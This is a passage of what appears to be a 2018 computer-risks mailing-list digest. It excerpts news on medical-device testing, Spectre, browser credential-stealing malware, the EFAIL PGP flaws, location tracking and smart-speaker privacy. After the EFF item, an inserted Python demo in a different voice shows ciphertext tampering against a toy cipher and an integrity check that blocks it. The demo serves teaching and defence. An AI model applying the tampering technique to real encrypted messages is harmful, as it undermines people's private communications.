    integration and high-speed regression -- are effective when capable test
    authors challenge software stack authors. Alas, industry (not just embedded
    medical implants, cars, cellphones, etc.) often economizes on qualification
    product life cycle stages. There are "too many bits" to test quickly and
    thoroughly. Governance decisions and gut judgment are sometimes applied with
    impunity.

    It appears that the FDA has gone rogue, and off-the-rails via regulatory
    capture. A business-friendly administration promoting "caveat emptor" as
    standard operating procedure also intensifies medical device implantation
    risks. Refer to "The Danger Within Us: America's Untested, Unregulated
    Medical Device Industry and One Man's Battle to Survive It" by Jeanne Lenzer
    for an exposé of the implantable medical device industry.

    If you are confronted with a "hard sell" to "go" for implantation, ask
    a few questions of your physician and the device salesperson:

    Are there any randomized control trials and non-industry funded studies that
    evaluate the candidate device's effectiveness in humans? Were the studies
    performed by a non-profit? Or a university? Does the entity reporting the
    study's results receive funding from the device manufacturer? Do any of the
    study's authors disclose industry ties? If so, a report that is published
    might possess skewed findings. Is the raw data from these studies available
    for inspection? If so, try to find a consultant to review it for you and
    render an opinion. Will the device manufacturer share their software and
    system test plans for inspection? If so, try to locate a person "skilled in
    the art of embedded software test" to evaluate the test plan, and the
    firmware test results released with the implanted device. Try to gain access
    to the manufacturer's defect tracking system to explore defect density and
    discovery rates and repair history.

    Does the device have a special mechanism to disable it, should it misbehave?
    If so, try to learn about how this is accomplished and ensure there are
    backup sources -- other physicians or facilities that possess this
    mechanism.

    How many implants have been performed in the past year? How many
    patient deaths occurred post-implantation? Never mind if the deaths
    were attributed to the device or not, find the raw count of deaths.

    For each post-implant death, was an FDA MAUDE report filed? How many of
    these reports were filed by medical practitioners? How many by the device
    manufacturer? Confront the salesperson to learn why, or if, there's a huge
    discrepancy between the number of deaths and the number of FDA MAUDE reports
    they or practitioners reported. That discrepancy is apparently a clue that
    the manufacturer is or has concealed important evidence about device
    capability or side-effects that can injure or kill you.

    Has the device been the subject of prior recalls? If so, why? Has the
    manufacturer been sued for product liability previously? Are they currently
    under litigation for liability? These questions can provide insight into
    their organization's maturity and ability to pro-actively act on
    lessons-learned.

    Is the device implantation under consideration being applied for "an
    off-label" application in your case? If so, why?

    ------------------------------

    Date: Fri, 18 May 2018 09:24:59 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Ex-Intel security expert: This new Spectre attack can even
    reveal firmware secrets" (Liam Tung)

    Liam Tung | 18 May 2018
    Ex-Intel security expert: This new Spectre attack can even reveal firmware
    secrets; A new variant of Spectre can expose the contents of memory that
    normally can't be accessed by the OS kernel.

    opening text:

    Yuriy Bulygin, the former head of Intel's advanced threat team, has
    published research showing that the Spectre CPU flaws can be used to break
    into the highly privileged CPU mode on Intel x86 systems known as System
    Management Mode (SMM).

    ------------------------------

    Date: Wed, 16 May 2018 09:11:51 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "This malware is harvesting saved credentials in Chrome, Firefox
    browsers" (ZDNet)

    This malware is harvesting saved credentials in Chrome, Firefox browsers
    Researchers say the new Vega Stealer malware is currently being used
    in a simple campaign but has the potential to go much further.
    By Charlie Osborne for Zero Day | May 14, 2018 -- 07:42 GMT (00:42
    PDT) | Topic: Security

    selected text:

    Vega Stealer is also written in .NET and focuses on the theft of
    saved credentials and payment information in Google Chrome. These
    credentials include passwords, saved credit cards, profiles, and cookies.

    When the Firefox browser is in use, the malware harvests specific
    files -- "key3.db" "key4.db", "logins.json", and "cookies.sqlite" --
    which store various passwords and keys.

    However, Vega Stealer does not wrap up there. The malware also takes
    a screenshot of the infected machine and scans for any files on the
    system ending in .doc, .docx, .txt, .rtf, .xls, .xlsx, or .pdf for
    exfiltration.

    According to the security researchers, the malware is currently being
    utilized to target businesses in marketing, advertising, public
    relations, retail, and manufacturing.

    ------------------------------

    Date: Wed, 23 May 2018 18:07:03 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: Student awarded $36,000 for remote execution flaw in Google App Engine
    (Charlie Osborne)

    Charlie Osborne for Zero Day | 22 May 2018
    Student awarded $36,000 for remote execution flaw in Google App Engine | ZDNet
    The discovery was made by a university student who was not aware of
    how dangerous the vulnerability was.

    opening text:

    Google has awarded a young cybersecurity researcher $36,337 for disclosing a
    severe vulnerability in the Google App Engine.

    The 18-year-old student from Uruguay's University of the Republic discovered
    a critical remote code execution (RCE) bug in the system, which is a
    framework and cloud platform used for the hosting and development of web
    applications in Google data centers.

    ------------------------------

    Date: Fri, 18 May 2018 09:05:54 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "This cryptocurrency phishing attack uses new trick to drain
    wallets" (Danny Palmer)

    Danny Palmer | 17 May 2018
    This cryptocurrency phishing attack uses new trick to drain wallets
    Campaign uses automation to empty cryptocurrency wallets and produce
    lucrative returns.

    ... the phishing campaign mimics the front end of the MyEtherWallet website
    for the purpose of stealing credentials, while also deploying what the
    authors call an "automated transfer system" to process the details captured
    by the fake page and transfer funds.

    The attack injects scripts into active web sessions and silently and
    invisibly executes bank transfers just seconds after the user logs
    into their cryptocurrency account.

    Researchers note that MyEtherWallet is an appealing target for attackers
    because it is simple to use, but its lack of security compared to other
    banks and exchanges makes it a prominent target for attack.

    After that, the crooks look to drain accounts when the victim decrypts their
    wallet. The scam uses scripts which automatically create the fund transfer
    by pressing the buttons like a legitimate user would, all while the activity
    remains hidden -- it's the first time an attack has been seen to use this
    automated tactic.

    ------------------------------

    Date: Wed, 16 May 2018 16:47:10 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Ex-JPMorgan Chase Blockchain Duo Unveil New Startup Clovyr (Fortune)

    Baldet, who most recently served as the bank’s blockchain program lead, is
    cofounding a new startup, Clovyr, that aims to help consumers, developers,
    and businesses explore the nascent, albeit burgeoning, world of
    blockchain-based, decentralized technologies, she tells Fortune. She is
    joined by Nielsen, former lead developer of Quorum, a JPMorgan Chase-built
    blockchain for business, who will serve as the concern’s chief technologist.

    Baldet unveiled a Clovyr demo at the Consensus conference in Manhattan on
    Monday afternoon. The company is in the process of fundraising.

    Clovyr's product, now under development, is slated to take the form of
    something akin to an app store, where people and businesses can experiment
    with a multitude of decentralized apps and services, developer toolsets, and
    underlying distributed ledgers. The cofounders envision the platform serving
    as a neutral ground, offering a browser-like dashboard for the
    blockchain-curious, through which Clovyr can provide support and other
    services to customers according to their needs.

    Ex-JPMorgan Chase Blockchain Duo Unveil New Startup

    Just what consumers need. What could go wrong? Also, what's with "Clovyr"
    name?

    ------------------------------

    Date: Thu, 17 May 2018 16:48:50 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: ICE abandons its dream of ‘extreme vetting’ software that could
    predict whether a foreign visitor would become a terrorist (WashPo)

    Immigration officials originally wanted artificial intelligence that could
    continuously track foreign visitors' social media. They're giving the job to
    humans instead.

    ICE just abandoned its dream of ‘extreme vetting’ software that could predict whether a foreign visitor would become a terrorist

    ------------------------------

    Date: Thu, 17 May 2018 15:10:11 -0600
    From: "Keith Medcalf" <kmed...@dessus.com>
    Subject: E-Mail Clients are Insecure, PGP and S/MIME 100% secure

    There is no "security" problem with either PGP or S/MIME encrypted and
    signed messages. The problem is, as it has been since the introduction of
    the ability to embed executable code into e-mail messages (aka, Web Pages
    and Rich Text via SMTP), the shoddy and useless security state of almost all
    e-mail clients.

    If you turn off the [expletive deleted] (HTML code execution, etc) then
    there is no problem. In other words, the only problem that exists is that
    which you created yourself. So if you do something utterly stupid, you
    deserve whatever you get in return.

    ------------------------------

    Date: Mon, 14 May 2018 15:06:45 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: E-mail Encryption Tools Are No Longer Safe, Researchers Say (Fortune)

    Throughout the many arguments over encrypted communications, there has been
    at least one constant: the venerable tools for strong email encryption are
    trustworthy. That may no longer be true.

    On Tuesday, well-credentialed cybersecurity researchers will detail what
    they call critical vulnerabilities in widely-used tools for applying PGP/GPG
    and S/MIME encryption. According to Sebastian Schinzel, a professor at the
    Münster University of Applied Sciences in Germany, the flaws could reveal
    the plaintext that email encryption is supposed to cover up -- in both
    current and old emails.

    The researchers are advising everyone to temporarily stop using plugins for
    mail clients like Microsoft Outlook and Apple Mail that automatically
    encrypt and decrypt emails -- at least until someone figures out how to
    remedy the situation. Instead, experts say, people should switch to tools
    like Signal, the encrypted messaging app that's bankrolled by WhatsApp
    co-founder Brian Acton.

    Stop Using Common Email Encryption Tools Immediately, Researchers Warn

    ------------------------------

    Date: Tue, May 15, 2018 at 12:38 AM
    From: Dewayne Hendricks <dew...@warpspeed.com>
    Subject: Not So Pretty: What You Need to Know About E-Fail and the PGP Flaw
    (EFF)

    Erica Portnoy, Danny O'Brien, and Nate Cardozo, EFF, 14 May 2018
    http://www.eff.org/deeplinks/2018/05/not-so-pretty-what-you-need-know-about-e-fail-and-pgp-flaw-0

    Don't panic! But you should stop using PGP for encrypted email and switch
    to a different secure communications method for now.

    A group of researchers released a paper today that describes a new class of
    serious vulnerabilities in PGP (including GPG), the most popular email
    encryption standard. The new paper includes a proof-of-concept exploit that
    can allow an attacker to use the victim's own email client to decrypt
    previously acquired messages and return the decrypted content to the
    attacker without alerting the victim. The proof of concept is only one
    implementation of this new type of attack, and variants may follow in the
    coming days.

    Because of the straightforward nature of the proof of concept, the severity
    of these security vulnerabilities, the range of email clients and plugins
    affected, and the high level of protection that PGP users need and expect,
    EFF is advising PGP users to pause in their use of the tool and seek other
    modes of secure end-to-end communication for now.

    Because we are awaiting the response from the security community of the
    flaws highlighted in the paper, we recommend that for now you uninstall or
    disable your PGP email plug-in. These steps are intended as a temporary,
    conservative stopgap until the immediate risk of the exploit has passed and
    been mitigated against by the wider community. There may be simpler
    mitigations available soon, as vendors and commentators develop narrower
    solutions, but this is the safest stance to take for now. Because sending
    PGP-encrypted emails to an unpatched client will create adverse ecosystem
    incentives to open incoming emails, any of which could be maliciously
    crafted to expose ciphertext to attackers.

    While you may not be directly affected, the other participants in your
    encrypted conversations are likely to be. For this attack, it isn't
    important whether the sender or the receiver of the original secret message
    is targeted. This is because a PGP message is encrypted to both of their
    keys.

    At EFF, we have relied on PGP extensively both internally and to secure
    much of our external-facing email communications. Because of the severity
    of the vulnerabilities disclosed today, we are temporarily dialing down our
    use of PGP for both internal and external email.

    Our recommendations may change as new information becomes available, and we
    will update this post when that happens.

    How The Vulnerabilities Work

    PGP, which stands for Pretty Good Privacy, was first released nearly 27
    years ago by Phil Zimmermann. Extraordinarily innovative for the time, PGP
    transformed the level of privacy protection available for digital
    communications, and has provided tech-savvy users with the ability to
    encrypt files and send secure email to people they've never met. Its strong
    security has protected the messages of journalists, whistleblowers,
    dissidents, and human rights defenders for decades. While PGP is now a
    privately-owned tool, an open source implementation called GNU Privacy
    Guard (GPG) has been widely adopted by the security community in a number
    of contexts, and is described in the OpenPGP Internet standards document.

    The paper describes a series of vulnerabilities that all have in common
    their ability to expose email contents to an attacker when the target opens
    a maliciously crafted email sent to them by the attacker. In these attacks,
    the attacker has obtained a copy of an encrypted message, but was unable to
    decrypt it.

    The first attack is a direct exfiltration attack that is caused by the
    details of how mail clients choose to display HTML to the user. The
    attacker crafts a message that includes the old encrypted message. The
    new message is constructed in such a way that the mail software
    displays the entire decrypted message -- including the captured
    ciphertext -- as unencrypted text. Then the email client's HTML parser
    immediately sends or exfiltrates the decrypted message to a server
    that the attacker controls.

    The second attack abuses the underspecification of certain details in the
    OpenPGP standard to exfiltrate email contents to the attacker by modifying
    a previously captured ciphertext. Here are some technical details of the
    vulnerability, in plain-as-possible language:

    When you encrypt a message to someone else, it scrambles the information
    into ciphertext such that only the recipient can transform it back into
    readable plaintext. But with some encryption algorithms, an attacker can
    modify the ciphertext, and the rest of the message will still decrypt back
    into the correct plaintext. This property is called malleability. This
    means that they can change the message that you read, even if they can't
    read it themselves.

    To address the problem of malleability, modern encryption algorithms add
    mechanisms to ensure integrity, or the property that assures the recipient
    that the message hasn't been tampered with. But the OpenPGP standard says
    that it's ok to send a message that doesn't come with an integrity check.
    And worse, even if the message does come with an integrity check, there are
    known ways to strip off that check. Plus, the standard doesn't say what to
    do when the check fails, so some email clients just tell you that the check
    failed, but show you the message anyway. ...

    http://dewaynenet.wordpress.com/feed/
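The two properties the EFF post describes, malleability and the value of an integrity check that the client actually enforces, can be shown in code. This is an added example, not EFF's or any OpenPGP implementation's code; the keystream cipher below is a stdlib toy standing in for OpenPGP's CFB mode (both are XOR-based and so malleable), and the keys, nonce and message are constructed sample values.

```python
import hashlib
import hmac


# Toy counter-mode keystream built from HMAC-SHA256 (stdlib only). It stands in
# for OpenPGP's CFB mode: any cipher that XORs plaintext with a keystream lets
# a ciphertext edit pass straight through to the decrypted text.
def keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    out = b""
    counter = 0
    while len(out) < length:
        block = nonce + counter.to_bytes(4, "big")
        out += hmac.new(key, block, hashlib.sha256).digest()
        counter += 1
    return out[:length]


def encrypt(key: bytes, nonce: bytes, plaintext: bytes) -> bytes:
    ks = keystream(key, nonce, len(plaintext))
    return bytes(p ^ k for p, k in zip(plaintext, ks))


decrypt = encrypt  # XOR with the same keystream undoes the encryption


def modify_ciphertext(ciphertext: bytes, offset: int, known: bytes, wanted: bytes) -> bytes:
    """Malleability, as the post describes it: someone who knows (or guesses)
    the plaintext bytes at `offset` can XOR in the difference and change what
    the recipient decrypts, without ever reading the message or holding the key."""
    if len(known) != len(wanted):
        raise ValueError("replacement must have the same length as the known text")
    edited = bytearray(ciphertext)
    for i, (k, w) in enumerate(zip(known, wanted)):
        edited[offset + i] ^= k ^ w
    return bytes(edited)


def seal(key: bytes, mac_key: bytes, nonce: bytes, plaintext: bytes):
    """Encrypt-then-MAC: the tag is the integrity check that modern schemes
    add and that the OpenPGP standard allows a sender to omit."""
    ct = encrypt(key, nonce, plaintext)
    tag = hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()
    return ct, tag


def decrypt_and_verify(key: bytes, mac_key: bytes, nonce: bytes, ct: bytes, tag):
    """Returns (status, plaintext). The plaintext is recovered in every case so
    that render() can show what a fail-open client would put on screen."""
    plaintext = decrypt(key, nonce, ct)
    if tag is None:
        return "MISSING_INTEGRITY_CHECK", plaintext
    expected = hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, tag):
        return "INTEGRITY_CHECK_FAILED", plaintext
    return "OK", plaintext


def render(status: str, plaintext: bytes, fail_open: bool = False) -> str:
    """Mail-client policy. fail_open=True is the behaviour the post criticises:
    report that the check failed but show the message anyway. fail_open=False
    treats a missing check exactly like a failed one and withholds the text."""
    text = plaintext.decode("utf-8", errors="replace")
    if status == "OK":
        return text
    if fail_open:
        return "WARNING (%s): %s" % (status, text)
    return "Message withheld: %s" % status


def demo():
    # Constructed sample values, not real keys or a real message.
    key, mac_key, nonce = b"k" * 32, b"m" * 32, b"nonce-01"
    original = b"Pay 100 USD to Alice"
    ct, tag = seal(key, mac_key, nonce, original)
    # Ciphertext edited by someone who only knows the message's fixed format.
    edited = modify_ciphertext(ct, 4, b"100", b"900")
    results = {"plain_edit": decrypt(key, nonce, edited)}
    status, pt = decrypt_and_verify(key, mac_key, nonce, edited, tag)
    results["with_tag"] = (status, render(status, pt), render(status, pt, fail_open=True))
    # The same edit with the integrity check stripped off entirely.
    status, pt = decrypt_and_verify(key, mac_key, nonce, edited, None)
    results["tag_stripped"] = (status, render(status, pt), render(status, pt, fail_open=True))
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```

Under the fail-open policy both the tampered and the tag-stripped message are displayed as "Pay 900 USD to Alice" behind a warning; under the fail-closed policy neither is shown, which is the client behaviour the post says the standard should have required.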

    ------------------------------

    Date: Thu, 24 May 2018 18:24:24 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "T-Mobile bug let anyone see any customer's account details"
    (Zack Whittaker)

    Zack Whittaker for Zero Day | 24 May 2018

    http://www.zdnet.com/article/tmobile-bug-let-anyone-see-any-customers-account-details/

    T-Mobile bug let anyone see any customer's account details Exclusive: The
    exposed lookup tool let anyone run a customer's phone number -- and obtain
    their home address and account PIN, used to contact phone support.

    selected text:

    A bug in T-Mobile's website let anyone access the personal account details
    of any customer with just their cell phone number.

    The flaw, since fixed, could have been exploited by anyone who knew where to
    look -- a little-known T-Mobile subdomain that staff use as a customer care
    portal to access the company's internal tools.

    Although the API is understood to be used by T-Mobile staff to look up
    account details, it wasn't protected with a password and could be easily
    used by anyone.

    The returned data included a customer's full name, postal address, billing
    account number, and in some cases information about tax identification
    numbers. The data also included customers' account information, such as if
    a bill is past-due or if the customer had their service suspended.

    The data also included references to account PINs used by customers as a
    security question when contacting phone support. Anyone could use that
    information to hijack accounts.

    [Gene also contributed a previous item from Zack Whittaker on 17 May
    on the same subject:
    http://www.zdnet.com/article/cell-p...ed-millions-of-americans-real-time-locations/
    I think the more recent one suffices here. PGN]

    ------------------------------

    Date: Fri, 18 May 2018 09:27:33 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Senator wants to know how police can locate any phone in
    seconds without a warrant" (Zack Whittaker)

    Zack Whittaker for Zero Day | May 11, 2018
    http://www.zdnet.com/article/securus-police-cell-phones-warrantless-tracking/

    Senator wants to know how police can locate any phone in seconds without a
    warrant. Real-time location data was accessible by police under "the legal
    equivalent of a pinky promise," said a senator who is demanding that the FCC
    investigate why a company, contracted to monitor calls of prison inmates,
    also allows police to track phones of anyone in the US without a warrant.

    The bombshell story in *The New York Times* revealed Securus, a Texas-based
    prison technology company, could track any phone "within seconds" by
    obtaining data from cellular giants -- including AT&T, Sprint, T-Mobile, and
    Verizon -- typically reserved for marketers.

    ------------------------------

    Date: Fri, 18 May 2018 09:29:13 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "US cell carriers are selling access to your real-time phone
    location data" (Zack Whittaker)

    Zack Whittaker, Zero Day, 14 May 2018
    http://www.zdnet.com/article/us-cell-carriers-selling-access-to-real-time-location-data/

    US cell carriers are selling access to your real-time phone location data
    The company embroiled in a privacy row has "direct connections" to all major
    US wireless carriers, including AT&T, Verizon, T-Mobile, and Sprint -- and
    Canadian cell networks, too.

    Four of the largest cell giants in the US are selling your real-time
    location data to a company that you've probably never heard about before.

    In case you missed it, a senator last week sent a letter demanding the
    Federal Communications Commission (FCC) investigate why Securus, a prison
    technology company, can track any phone "within seconds" by using data
    obtained from the country's largest cell giants, including AT&T, Verizon,
    T-Mobile, and Sprint, through an intermediary, LocationSmart.

    ------------------------------

    Date: Sat, 19 May 2018 07:36:23 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Hundreds of Apps Can Empower Stalkers to Track Their Victims
    (The New York Times)

    http://mobile.nytimes.com/2018/05/19/technology/phone-apps-stalking.html

    'KidGuard is a phone app that markets itself as a tool for keeping tabs on
    children. But it has also promoted its surveillance for other purposes and
    run blog posts with headlines like *How to Read Deleted Texts on Your
    Lover's Phone.*

    'A similar app, mSpy, offered advice to a woman on secretly monitoring her
    husband. Still another, Spyzie, ran ads on Google alongside results for
    search terms like *catch cheating girlfriend iPhone*.

    'As digital tools that gather cellphone data for tracking children,
    friends or lost phones have multiplied in recent years, so have the
    options for people who abuse the technology to track others without
    consent.'

    Surveillance capitalism is booming. These apps are e^(to the creepy).

    ------------------------------

    Date: Fri, 18 May 2018 15:06:20 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Voice squatting attacks: Hacks turn Amazon Alexa, Google Home
    into secret eavesdroppers" (CSO Online)

    http://www.csoonline.com/article/32...xa-google-home-into-secret-eavesdroppers.html

    Voice squatting attacks: Hacks turn Amazon Alexa, Google Home into secret
    eavesdroppers. Researchers devise two new attacks -- voice squatting
    and voice masquerading -- on Amazon Alexa and Google Home, allowing
    adversaries to steal personal information or silently eavesdrop.

    Ms. Smith, CSO | 17 May 2018

    Ms. Smith (not her real name) is a freelance writer and programmer with a
    special and somewhat personal interest in IT privacy and security issues.

    opening text:

    Oh, goody, Amazon Alexa and/or Google Home could be hit with remote,
    large-scale "voice squatting" and "voice masquerading" attacks to steal
    sensitive user information or eavesdrop on conversations.

    ------------------------------

    Date: Fri, 18 May 2018 17:56:12 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: So, Umm, Google Duplex's Chatter Is Not Quite Human
    (Scientific American)

    http://www.scientificamerican.com/article/so-umm-google-duplexs-chatter-is-not-quite-human/

    "Google’s Duplex voice assistant drew applause last week at the company’s
    annual I/O developer conference after CEO Sundar Pichai demonstrated the
    artificially intelligent technology autonomously booking a hair salon
    appointment and a restaurant reservation, apparently fooling the people
    who took the calls. But enthusiasm has since been tempered with unease
    over the ethics of a computer making phone calls under the guise of being
    human. Such a mixed reception has become increasingly common for Google,
    Amazon, Facebook and other tech companies as they push AI's boundaries in
    ways that do not always seem to consider consumer privacy or safety
    concerns."

    ------------------------------

    Date: Fri, 18 May 2018 08:27:18 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Henry Kissinger Is Scared of 'Unstable' Artificial Intelligence
    (The Wrap)

    via NNSquad
    http://www.thewrap.com/henry-kissinger-is-scared-of-unstable-artificial-intelligence/

    The former U.S. secretary of state is warning against the threat of
    "unstable" artificial intelligence in a new essay in The Atlantic --
    fearing the rapid rise of machines could lead to questions humanity is not
    ready to tackle.

    ------------------------------

    Date: Sat, 19 May 2018 17:56:25 -0700
    From: Monty Solomon <mo...@roscom.com>
    Subject: Service Meant to Monitor Inmates' Calls Could Track You, Too (NYT)

    http://www.nytimes.com/2018/05/10/technology/cellphone-tracking-law-enforcement.html

    A company catering to law enforcement and corrections officers has raised
    privacy concerns with a product that can locate almost anyone's cellphone
    across the United States.

    ------------------------------

    Date: Fri, 18 May 2018 17:53:59 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Gunshot Sensors Pinpoint Destructive Fish Bombs (SciAm)

    http://www.scientificamerican.com/article/gunshot-sensors-pinpoint-destructive-fish-bombs/

    "Rogue fishers around the world toss explosives into the sea and scoop up
    bucketloads of stunned or dead fish, an illegal practice in many nations
    that can destroy coral reefs and wreak havoc on marine biodiversity.
    Catching perpetrators amid the vastness of the ocean has long proved
    almost impossible, but researchers working in Malaysia have now adapted
    acoustic sensors—originally used to locate urban gunfire—to pinpoint these
    marine blasts within tens of meters."

    Example of dual-use technology for public and environmental safety
    maintenance.

    ------------------------------

    Date: Mon, 21 May 2018 12:04:35 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Most GDPR emails unnecessary and some illegal, say experts
    (The Guardian)

    NNSquad
    http://www.theguardian.com/technolo...cessary-and-in-some-cases-illegal-say-experts

    The vast majority of emails flooding inboxes across Europe from companies
    asking for consent to keep recipients on their mailing list are
    unnecessary and some may be illegal, privacy experts have said, as new
    rules over data privacy come into force at the end of this week.

    AND EVEN WORSE: "Warning: New European Privacy Law Has Become a
    Jackpot for Internet Crooks" -

    http://lauren.vortex.com/2018/05/01...-law-has-become-a-jackpot-for-internet-crooks

    ------------------------------

    Date: Wed, 23 May 2018 13:58:50 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: The Pentagon Has a Big Plan to Solve Identity Verification in
    Two Years (Defense One)

    The plan grew out of efforts to modernize the Defense Department's ID cards.

    The Defense Department is funding a project that officials say could
    revolutionize the way companies, federal agencies and the military itself
    verify that people are who they say they are and it could be available in
    most commercial smartphones within two years.

    The technology, which will be embedded in smartphones’ hardware, will
    analyze a variety of identifiers that are unique to an individual, such as
    the hand pressure and wrist tension when the person holds a smartphone and
    the person’s peculiar gait while walking, said Steve Wallace, technical
    director at the Defense Information Systems Agency.

    Organizations that use the tool can combine those identifiers to give the
    phone holder a “risk score,” Wallace said. If the risk score is low enough,
    the organization can presume the person is who she says she is and grant her
    access to sensitive files on the phone or on a connected computer or grant
    her access to a secure facility. If the score’s too high, she’ll be locked
    out.

    http://www.defenseone.com/technolog...solve-identity-verification-two-years/148280/

    ------------------------------

    Date: Thu, 24 May 2018 17:41:32 PDT
    From: "Peter G. Neumann" <neu...@csl.sri.com>
    Subject: Unplug Your Echo! (Ars Technica)

    [Thanks to Phil Porras]
    http://arstechnica.com/gadgets/2018...o-device-secretly-shared-users-private-audio/

    Amazon confirmed an Echo owner's privacy-sensitive allegation on Thursday,
    after Seattle CBS affiliate KIRO-7 reported that an Echo device in Oregon
    sent private audio to someone on a user's contact list without permission.
    ... "Unplug your Alexa devices right now," the user, Danielle (no last name
    given), was told by her husband's colleague in Seattle after he received
    full audio recordings between her and her husband, according to the KIRO-7
    report. The disturbed owner, who is shown in the report juggling four
    unplugged Echo Dot devices, said that the colleague then sent the offending
    audio to Danielle and her husband to confirm the paranoid-sounding
    allegation. (Before sending the audio, the colleague confirmed that the
    couple had been talking about hardwood floors.)

    After calling Amazon customer service, Danielle said she received the
    following explanation and response: "'Our engineers went through all of your
    logs. They saw exactly what you told us, exactly what you said happened, and
    we're sorry.' He apologized like 15 times in a matter of 30 minutes. 'This
    is something we need to fix.'" ... Ya think?

    ------------------------------

    Date: Tue, 22 May 2018 18:15:53 PDT
    From: "Peter G. Neumann" <neu...@csl.sri.com>
    Subject: FBI dramatically overstates how many phones they can't get into (WaPo)

    http://www.washingtonpost.com/world...68ae90-5dce-11e8-a4a4-c070ef53f315_story.html

    The FBI has repeatedly provided grossly inflated statistics to Congress and
    the public about the extent of problems posed by encrypted cellphones,
    claiming investigators were locked out of nearly 7,800 devices connected to
    crimes last year when the correct number was much smaller, probably between
    1,000 and 2,000, The Washington Post has learned. [They've actually been
    triple-counting! PGN]

    Over a period of seven months, FBI Director Christopher A. Wray cited the
    inflated figure as the most compelling evidence for the need to address what
    the FBI calls Going Dark -- the spread of encrypted software that can block
    investigators' access to digital data even with a court order.

    The FBI first became aware of the miscount about a month ago and still does
    not have an accurate count of how many encrypted phones they received as
    part of criminal investigations last year, officials said. Last week, one
    internal estimate put the correct number of locked phones at 1,200, though
    officials expect that number to change as they launch a new audit, which
    could take weeks to complete, according to people familiar with the work. [...]

    [See EFF's take on this:
    http://www.eff.org/deeplinks/2018/05/fbi-admits-it-inflated-number-supposedly-unhackable-devices
    PGN]

    ------------------------------

    Date: Fri, 18 May 2018 09:13:42 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Google to remove "secure" indicator from HTTPS pages on Chrome"
    (ZDNet)

    [In other news, your local second-level (province, state, prefecture,
    etc.) government announced plans to remove those curve speed caution signs
    to make the roads safer. Well, not actually. They have a bit more sense
    than Google. GW]

    http://www.zdnet.com/article/google-to-remove-secure-indicator-from-https-pages-on-chrome/

    Stephanie Condon, ZDNet, 17 May 2018
    Google to remove "secure" indicator from HTTPS pages on Chrome
    Users should expect the web to be safe by default, Google explained.

    As part of its push to make the web safer, Google on Thursday said it will
    stop marking HTTPS pages as "secure."

    The logic behind the move, Google explained, is that "users should expect
    that the web is safe by default." It will remove the green padlock and
    "secure" wording from the address bar beginning with Chrome 69 in September.

    ------------------------------

    Date: Thu, 17 May 2018 15:55:43 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Google's Selfish Ledger is an unsettling vision of Silicon Valley
    social engineering (The Verge)

    Google has built a multibillion-dollar business out of knowing everything
    about its users. Now, a video produced within Google and obtained by The
    Verge offers a stunningly ambitious and unsettling look at how some at the
    company envision using that information in the future.

    The video was made in late 2016 by Nick Foster, the head of design at X
    (formerly Google X), and a co-founder of the Near Future Laboratory. The
    video, shared internally within Google, imagines a future of total data
    collection, where Google helps nudge users into alignment with their goals,
    custom-prints personalized devices to collect more data, and even guides the
    behavior of entire populations to solve global problems like poverty and
    disease.

    When reached for comment on the video, an X spokesperson provided the
    following statement to The Verge:

    “We understand if this is disturbing -- it is designed to be. This is a
    thought-experiment by the Design team from years ago that uses a technique
    known as ‘speculative design’ to explore uncomfortable ideas and concepts
    in order to provoke discussion and debate. It's not related to any current
    or future products.”

    http://www.theverge.com/2018/5/17/17344250/google-x-selfish-ledger-video-data-privacy

    ------------------------------

    Date: Fri, 18 May 2018 09:31:10 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "A flaw in a connected alarm system exposed vehicles to remote
    hacking" (ZDNet)

    Zack Whittaker for Zero Day | 17 May 2018
    http://www.zdnet.com/article/flaw-connected-alarm-system-exposed-vehicles-remote-hacking/

    The researchers said it was easy to locate a nearby car, unlock it, and
    drive away.

    opening text:

    A bug that allowed two researchers to gain access to the backend systems of
    a popular Internet-connected vehicle management system could have given a
    malicious hacker everything they needed to track the vehicle's location,
    steal user information, and even cut out the engine.

    In a disclosure this week, the researchers Vangelis Stykas and George
    Lavdanis detailed a bug in a misconfigured server run by Calamp, a
    telematics company that provides vehicle security and tracking, which gave
    them "direct access to most of its production databases."

    ------------------------------

    Date: Thu, 17 May 2018 20:55:36 -0700
    From: Monty Solomon <mo...@roscom.com>
    Subject: Syrian hackers who tricked reporters indicted (WashPo)

    The pair used phishing schemes to compromise news organizations.

    http://www.washingtonpost.com/local...9ef328-59e7-11e8-858f-12becb4d6067_story.html

    ------------------------------

    Date: Fri, 18 May 2018 08:57:22 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Cisco critical flaw warning: These 10/10 severity bugs need
    patching now" (ZDNet)

    Liam Tung, ZDNet, 17 May 2018

    http://www.zdnet.com/article/cisco-critical-flaw-warning-these-1010-severity-bugs-need-patching-now/

    Cisco critical flaw warning: These 10/10 severity bugs need patching now
    Cisco's software for managing software-defined networks has three critical,
    remotely exploitable vulnerabilities.

    ------------------------------

    Date: Thu, 17 May 2018 21:01:00 -0700
    From: Monty Solomon <mo...@roscom.com>
    Subject: Is technology bringing history to life or distorting it? (WashPo)

    From a digitized JFK speech that he never gave to colorized Lincoln and
    Holocaust photos, scholars are debating a wave of historical re-creation
    and manipulation.

    http://www.washingtonpost.com/news/...gy-bringing-history-to-life-or-distorting-it/

    ------------------------------

